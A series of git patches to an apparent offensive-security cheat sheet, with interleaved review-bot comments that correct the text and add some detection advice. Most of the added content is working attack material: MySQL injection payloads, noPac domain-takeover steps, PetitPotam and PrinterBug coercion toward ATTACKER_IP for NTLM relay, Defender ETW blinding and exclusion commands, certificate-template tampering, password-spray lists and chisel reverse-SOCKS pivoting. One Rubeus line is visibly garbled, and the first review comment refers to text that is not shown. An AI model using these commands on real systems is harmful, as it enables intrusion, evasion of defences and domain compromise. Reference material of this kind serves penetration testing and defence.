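Review bot: The path shown is the all-users (common) Startup folder, not "the user startup folder" as the sentence says; writing to it needs administrative rights, which is what makes this section "Elevated", and the script runs at every interactive logon of any user in that user's context rather than as SYSTEM. Suggested wording: `Create a batch script in the all-users Startup folder (admin rights required to write; runs at each interactive logon, as the logging-on user):`. The per-user equivalent `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` needs no elevation and belongs in the non-elevated persistence section.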
From a568270b15e3676ef9189d45cc7617df645508d0 Mon Sep 17 00:00:00 2001
From: Alex G <24873615+Zeecka@users.noreply.github.com>
Date: Thu, 16 Dec 2021 12:11:25 +0100
Subject: [PATCH 09/50] Add NAME_CONST for MySQL Error based injection
---
SQL Injection/MySQL Injection.md | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 1764a13..7edb7e2 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -220,6 +220,16 @@ Works with `MySQL >= 5.1`
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```
+### MYSQL Error Based - NAME_CONST function (only for constants)
+
+Works with `MySQL >= 5.0`
+
+```sql
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)--
+?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
+```
+
## MYSQL Blind
### MYSQL Blind with substring equivalent
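Review bot: The section does not say how the value comes back: the derived table with two identical `NAME_CONST` columns makes MySQL raise `ERROR 1060: Duplicate column name '<value>'`, so the technique only works when the application reflects database error text to the client. Add a comment above the payloads, e.g. `-- leaks via "Duplicate column name '<value>'"; requires DB errors to be displayed`. As far as I recall `NAME_CONST` was introduced in 5.0.12, so `MySQL >= 5.0.12` is more precise than `>= 5.0`.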
From a430cfcc4ea0a43ed07f3e8fe2af01cfab63ca96 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 22 Dec 2021 16:09:07 +0100
Subject: [PATCH 10/50] update PowerGPOAbuse task command
---
Methodology and Resources/Active Directory Attack.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c9644aa..493a36e 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -1021,7 +1021,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
# Create an immediate task
-PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator
+PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO'
```
#### Abuse GPO with pyGPOAbuse
@@ -3347,4 +3347,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
-* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
\ No newline at end of file
+* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
From e3fb516747b89419e2974f701beb16b14a679f28 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 29 Dec 2021 14:48:42 +0100
Subject: [PATCH 11/50] MAQ + WEBDAV
---
.../Active Directory Attack.md | 70 ++++++++++++++++---
.../Windows - Persistence.md | 3 +
.../Windows - Privilege Escalation.md | 4 +-
3 files changed, 66 insertions(+), 11 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c9644aa..15269f8 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -600,6 +600,11 @@ Exploit steps from the white paper
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
```
+* `CrackMapExec` - only check
+ ```powershell
+ crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
+ ```
+
#### PrintNightmare
> CVE-2021-1675 / CVE-2021-34527
@@ -679,21 +684,38 @@ Requirements:
> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller.
**Requirements**
+
* MachineAccountQuota > 0
+**Check for exploitation**
+
+0. Check the MachineAccountQuota of the account
+ ```powershell
+ crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
+ StandIn.exe --object ms-DS-MachineAccountQuota=*
+ ```
+1. Check if the DC is vulnerable
+ ```powershell
+ crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
+ ```
+
**Exploitation**
0. Create a computer account
```powershell
impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
+ powermad@windows> . .\Powermad.ps1
powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose
+
+ sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword
```
1. Clear the controlled machine account `servicePrincipalName` attribute
```ps1
impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
+ powershell@windows> . .\Powerview.ps1
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
```
2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$`
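Review bot: Step 0 of the new **Check for exploitation** list says "Check the MachineAccountQuota of the account", but `ms-DS-MachineAccountQuota` is an attribute of the domain object (which is what the `StandIn.exe --object` query on the following line reads), not of a user account; suggest `0. Check the MachineAccountQuota of the domain`. The **Requirements** bullet `MachineAccountQuota > 0` is also the hardening lever a defender should take from this section: setting the quota to 0 and delegating machine-join rights explicitly removes the precondition for the whole chain, so a sentence saying so under the Mitigations of this section would be worth adding. The Exploitation list continues past the end of this hunk.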
@@ -755,9 +777,22 @@ Automated exploitation:
C:\Windows\system32>whoami
nt authority\system
```
+* [Pachine - @ly4k](https://github.com/ly4k/Pachine)
+ ```powershell
+ usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local]
+ [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip]
+ [domain/]username[:password]
+ $ python3 pachine.py -dc-host dc.predator.local -scan 'predator.local/john:Passw0rd!'
+ $ python3 pachine.py -dc-host dc.predator.local -spn cifs/dc.predator.local -impersonate administrator 'predator.local/john:Passw0rd!'
+ $ export KRB5CCNAME=$PWD/administrator@predator.local.ccache
+ $ impacket-psexec -k -no-pass 'predator.local/administrator@dc.predator.local'
+ ```
**Mitigations**:
-* KB5008602
+* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
+* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
+* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)
+* [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31)
* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e)
* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
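Review bot: The rewritten **Mitigations** list is patch-only, and the linked KB5008380 guidance (not quoted here) introduces the CVE-2021-42287 fix in phases, so installing the November 2021 updates does not by itself enforce the new PAC checks; the list should tell the reader to verify that enforcement is active on every DC, not only that the KBs are installed. A detection line would also fit here: the chain documented above necessarily creates a computer account (Security Event ID 4741) and then renames it (Event ID 4781) to a name colliding with an existing DC, which is a high-fidelity pattern to alert on. The `MachineAccountQuota > 0` requirement earlier in this section is the configuration to review alongside the patches.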
@@ -1245,9 +1280,10 @@ Most of the time the best passwords to spray are :
- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz`
- `Welcome1`/`Welcome01`
-- $Companyname1 :` $Microsoft1`
+- $Companyname1 :`$Microsoft1`
- SeasonYear : `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
+- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0)
#### Kerberos pre-auth bruteforcing
@@ -1853,7 +1889,7 @@ root@kali:~$ klist
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
**Exploitation**:
-* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge
+* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
```ps1
HTTPS = On
DNS = On
@@ -1863,7 +1899,7 @@ root@kali:~$ klist
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
```
-* Fire Responder: `responder -I eth0 --lm`
+* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication
* Force a callback:
```ps1
PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
@@ -2108,7 +2144,7 @@ secretsdump.py -k -no-pass target.lab.local
#### Relaying with WebDav Trick
-> Example of exploitation where you can coerce machine accounts to authenticate to a host annd combine it with Resource Based Constrained Delegation to gain elevated access.
+> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
**Requirement**:
* WebClient service
@@ -2117,8 +2153,23 @@ secretsdump.py -k -no-pass target.lab.local
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
-* Discover WebDAV using [GetWebDAVStatus](https://github.com/G0ldenGunSec/GetWebDAVStatus): `GetWebDAVStatus.exe 10.0.0.4`
-* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/pentestlab 10.0.0.4`
+* Discover WebDAV services
+ ```ps1
+ webclientservicescanner 'domain.local'/'user':'password'@'machine'
+ crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+ GetWebDAVStatus.exe 'machine'
+ ```
+* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
+ ```ps1
+ # PrinterBug
+ dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP"
+ SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt"
+
+ # PetitPotam
+ Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP"
+ Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP"
+ PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP"
+ ```
* Use the created account to ask for a service ticket:
```ps1
.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l lsadump::dcsync /user:krbtgt
```
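Review bot: `nltmrelayx` in the rewritten trigger bullet is a typo for `ntlmrelayx`, the tool named in the RBCD bullet three lines above; the same misspelling was on the removed line, so this is the moment to fix it. The defender-relevant caveat the hunk now implies should be stated outright: the trick works only because the coerced host's `WebClient` service is running and the relay target (`ldaps://dc`) accepts relayed authentication, so the corresponding mitigations are to keep WebClient disabled where it is not needed and to enable LDAP signing and channel binding on the DCs. The closing lines of this hunk (the `Rubeus.exe hash` line and its fence) appear truncated in this rendering and seem to have absorbed the header of the following hunk, so their exact content could not be reviewed.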
-* Version 3: ADCSPwn
+* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
```powershell
https://github.com/bats3c/ADCSPwn
adcspwn.exe --adcs --port [local port] --remote [computer]
@@ -3347,4 +3398,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
-* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
\ No newline at end of file
+* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
+* [WebDAV, NTLM & Responder - Didier Stevens - Monday 20 May 2019](https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 39847c0..916f67e 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -60,6 +60,9 @@ MpCmdRun.exe -RemoveDefinitions -All
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install
+
+# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
+reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
```
## Disable Windows Firewall
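Review bot: The comment on the new `reg add` line speaks of "registry values" in the plural, but the command sets a single `Start` value of one Autologger session; either narrow it to `# Blind Defender ETW: set the Start value of the DefenderApiLogger autologger session to 0` or say that further sessions exist without listing them. For readers on the blue side it is worth adding that writes under `HKLM\System\CurrentControlSet\Control\WMI\Autologger\` are rare in normal operation and make a strong tamper-detection rule, and that where Defender Tamper Protection is enabled the change may be blocked or reverted, so the technique is not silent.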
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index c67f48e..8743b0f 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -1396,10 +1396,10 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
### MS17-010 (Eternal Blue)
-Check the vulnerability with the following nmap script.
+Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`.
```c
-nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010
+nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010
```
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
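Review bot: The nmap line this commit rewrites still carries a non-ASCII dash in the script name as rendered here (`smb-vuln-ms17–010`), so the removed and added lines look identical and the command would fail with a script-not-found error; the script shipped with nmap is `smb-vuln-ms17-010` with plain hyphens, i.e. `nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010`. If the intended change was exactly that dash fix, please confirm the committed byte is an ASCII hyphen (U+002D).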
From 8411a0640dc0f30b1503b65965dd5135cd9af1b4 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 29 Dec 2021 15:00:22 +0100
Subject: [PATCH 12/50] ESC4 - Access Control Vulnerabilities
---
.../Active Directory Attack.md | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index ac26153..474dff3 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -75,6 +75,7 @@
- [Active Directory Certificate Services](#active-directory-certificate-services)
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
+ - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@@ -2232,6 +2233,22 @@ Exploitation:
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
+#### ESC4 - Access Control Vulnerabilities
+
+* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
+ ```ps1
+ python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
+ ```
+* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
+ ```ps1
+ python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
+ ```
+* Perform ESC1 and then restore the value
+ ```ps1
+ python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
+ ```
+
+
#### ESC8 - AD CS Relay Attack
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
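Review bot: The first ESC4 bullet should say what the all-zero GUID means, otherwise the reader does not know why that ACE matters: a `WriteProperty` ACE whose object type is `00000000-0000-0000-0000-000000000000` applies to every attribute of the template, including the `mspki-Certificate-Name-Flag` modified in the next step; suggest appending `(a null object GUID means the ACE covers all properties of the template)`. A **Mitigation** line comparable to the neighbouring ESC sections would also help: review the ACLs of objects under the Certificate Templates container and enable auditing of Directory Service Changes (Event ID 5136) on them, so that the modify-then-restore pattern in steps 2 and 3 leaves a visible trace.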
@@ -3399,3 +3416,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
+* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
From c9ef8f7f4935e789ec2afcfb35e318a2b7b9d206 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 29 Dec 2021 18:16:26 +0100
Subject: [PATCH 13/50] Graftcp Cheatsheet
---
File Inclusion/README.md | 1 +
.../Network Pivoting Techniques.md | 40 +++++++++++++++----
2 files changed, 34 insertions(+), 7 deletions(-)
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index cc4a67f..0e6c0b5 100644
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -433,3 +433,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
+* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 670fae3..68a6197 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -82,17 +82,43 @@ socks4 localhost 8080
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
-## Graphtcp
+## Graftcp
-Same as proxychains, with another mechanism to "proxify" which allow Go applications.
+> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy.
-```powershell
-git clone https://github.com/hmgle/graftcp.git
-cd graftcp && make
-graftcp-local/graftcp-local
-./graftcp chromium-browser
+:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications.
+
+```ps1
+# https://github.com/hmgle/graftcp
+
+# Create a SOCKS5, using Chisel or another tool and forward it through SSH
+(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
+(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse
+(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks
+
+# Run graftcp and specify the SOCKS5
+(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
+(attacker) $ graftcp ./nuclei -u http://172.16.1.24
```
+Simple configuration file for graftcp
+
+```py
+# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf
+## Listen address (default ":2233")
+listen = :2233
+loglevel = 1
+
+## SOCKS5 address (default "127.0.0.1:1080")
+socks5 = 127.0.0.1:1080
+# socks5_username = SOCKS5USERNAME
+# socks5_password = SOCKS5PASSWORD
+
+## Set the mode for select a proxy (default "auto")
+select_proxy_mode = auto
+```
+
+
## Web SOCKS - reGeorg
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
From 5b131ec479e153b78b0a19cafaf4963b41cb0bf1 Mon Sep 17 00:00:00 2001
From: Houziaux Mike
Date: Sat, 1 Jan 2022 11:43:58 +0100
Subject: [PATCH 14/50] Update extensions.lst
---
Upload Insecure Files/Extension PHP/extensions.lst | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst
index b348161..acb75fe 100644
--- a/Upload Insecure Files/Extension PHP/extensions.lst
+++ b/Upload Insecure Files/Extension PHP/extensions.lst
@@ -6,6 +6,7 @@
.php4
.php5
.php7
+.php8
.pht
.phar
.phpt
@@ -17,4 +18,4 @@
.php%00.png
.php\x00.png
.php%00.jpg
-.php\x00.jpg
\ No newline at end of file
+.php\x00.jpg
From d037335a4aec05c35edcbee3583b579f4d190dbf Mon Sep 17 00:00:00 2001
From: enaylal
Date: Sat, 1 Jan 2022 11:48:07 +0100
Subject: [PATCH 15/50] add file php8
---
Upload Insecure Files/Extension PHP/phpinfo.php8 | 1 +
1 file changed, 1 insertion(+)
create mode 100644 Upload Insecure Files/Extension PHP/phpinfo.php8
diff --git a/Upload Insecure Files/Extension PHP/phpinfo.php8 b/Upload Insecure Files/Extension PHP/phpinfo.php8
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload Insecure Files/Extension PHP/phpinfo.php8
@@ -0,0 +1 @@
+
From b5df6e1447596cb675a6c8c5351d546c1d531a83 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 1 Jan 2022 20:42:58 +0100
Subject: [PATCH 16/50] ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + Golden
Certificate
---
.../Active Directory Attack.md | 37 ++++++++++---
.../Windows - Persistence.md | 52 +++++++++++++++++++
2 files changed, 83 insertions(+), 6 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 474dff3..b0600c7 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -76,6 +76,7 @@
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
+ * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@@ -2182,7 +2183,8 @@ secretsdump.py -k -no-pass target.lab.local
### Active Directory Certificate Services
-Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
#### ESC1 - Misconfigured Certificate Templates
@@ -2197,6 +2199,7 @@ Exploitation:
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
```ps1
Certify.exe find /vulnerable
+ Certify.exe find /vulnerable /currentuser
or
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
```
@@ -2223,7 +2226,7 @@ Exploitation:
#### ESC2 - Misconfigured Certificate Templates
Requirements:
-* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
+* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
Exploitation:
* Find template
@@ -2235,6 +2238,8 @@ Exploitation:
#### ESC4 - Access Control Vulnerabilities
+> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
+
* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
